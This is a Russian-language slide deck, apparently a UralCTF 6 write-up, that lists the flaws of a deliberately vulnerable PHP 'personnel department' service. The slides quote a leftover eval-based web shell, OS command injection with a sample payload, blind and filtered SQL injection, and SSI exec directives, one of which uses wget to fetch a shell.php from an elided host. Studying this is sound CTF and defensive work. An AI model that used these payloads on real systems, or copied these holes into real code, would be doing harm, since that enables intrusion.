![Старый шелл код mysql.php: @$_GET[‘code’]&& eval(base64_decode($_GET[‘code’])); print_r(mysql_fetch_array(mysql_query(…)))](https://image.slidesharecdn.com/1f5694b92ab2c96e2038b33a8b0ceb7d2980-111109121108-phpapp01/85/1f5694b92ab2c96e2038b33a8b0ceb7d-3-320.jpg)
![Инъекция ОС index.php: $act=@$_GET['act']; if(!$act)$act='index'; eval(`type {$act}.inc`); ?act=add.inc && echo+ ” phpinfo() ”&& cat+add](https://image.slidesharecdn.com/1f5694b92ab2c96e2038b33a8b0ceb7d2980-111109121108-phpapp01/85/1f5694b92ab2c96e2038b33a8b0ceb7d-4-320.jpg)
![Слепая SQL инъекция $ip= @$_SERVER[‘ HTTP_ X_FORWARDED_FOR']? $_SERVER[' HTTP_ X_FORWARDED_FOR']: $_SERVER['REMOTE_ADDR']; INSERT INTO `log` (url,ip,time) VALUES ('{$url}','{$ip}',NOW())](https://image.slidesharecdn.com/1f5694b92ab2c96e2038b33a8b0ceb7d2980-111109121108-phpapp01/85/1f5694b92ab2c96e2038b33a8b0ceb7d-5-320.jpg)
![??? //if($info['flag'])echo '<span style="display:none;)">'.$info['flag'].'</span>'; $sort='LAST'; // eval(`type {$act}.inc`);](https://image.slidesharecdn.com/1f5694b92ab2c96e2038b33a8b0ceb7d2980-111109121108-phpapp01/85/1f5694b92ab2c96e2038b33a8b0ceb7d-8-320.jpg)
1f5694b92ab2c96e2038b33a8b0ceb7d
- 1. Отдел кадров Самый простой сервис UralCTF 6
- 2. Стандартные пароли Меняйте все пароли, какие только возможно сменить! Кроме того, хорошо бы удалить не нужные файлы, например phpinfo.php
- 3. Старый шелл код mysql.php: @$_GET[‘code’]&& eval(base64_decode($_GET[‘code’])); print_r(mysql_fetch_array(mysql_query(…)))
- 4. Инъекция ОС index.php: $act=@$_GET['act']; if(!$act)$act='index'; eval(`type {$act}.inc`); ?act=add.inc && echo+ ” phpinfo() ”&& cat+add
- 5. Слепая SQL инъекция $ip= @$_SERVER[‘ HTTP_ X_FORWARDED_FOR']? $_SERVER[' HTTP_ X_FORWARDED_FOR']: $_SERVER['REMOTE_ADDR']; INSERT INTO `log` (url,ip,time) VALUES ('{$url}','{$ip}',NOW())
- 6. SQL инъекция show.inc: $sort=preg_replace('/UNION|SELECT| -- | |\/\*(.*)\*\//i','',$sort,E_STRICT); $sql="HANDLER $mysql_table READ id $sort WHERE flag='' LIMIT 1";
- 7. SSI LoadModule include_module modules/mod_include.so Options +Includes AddOutputFilter INCLUDES .php <!--#exec cmd="ls - la " --> <!--#exec cmd=“ wget http://.../shell.php " -->
- 8. ??? //if($info['flag'])echo '<span style="display:none;)">'.$info['flag'].'</span>'; $sort='LAST'; // eval(`type {$act}.inc`);
- 9. Ваши вопросы? Совсем нету?